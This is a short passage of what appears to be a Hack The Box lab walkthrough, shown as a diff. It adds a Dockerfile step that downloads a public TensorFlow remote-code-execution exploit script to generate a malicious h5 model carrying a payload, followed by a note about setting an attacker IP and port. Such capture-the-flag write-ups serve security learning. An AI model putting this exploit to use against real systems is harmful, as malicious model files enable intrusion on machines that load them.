beaulieuhugo97/htb-walkthroughs/Artificial.md

 I add this to the `Dockerfile` build phase:
 ```
-# Download exploit to generate a malicious h5 model containing a payload
+# Download the exploit to generate a malicious h5 model containing a payload
 RUN curl -O https://raw.githubusercontent.com/Splinter0/tensorflow-rce/refs/heads/main/exploit.py

 # Replace the attacker IP and port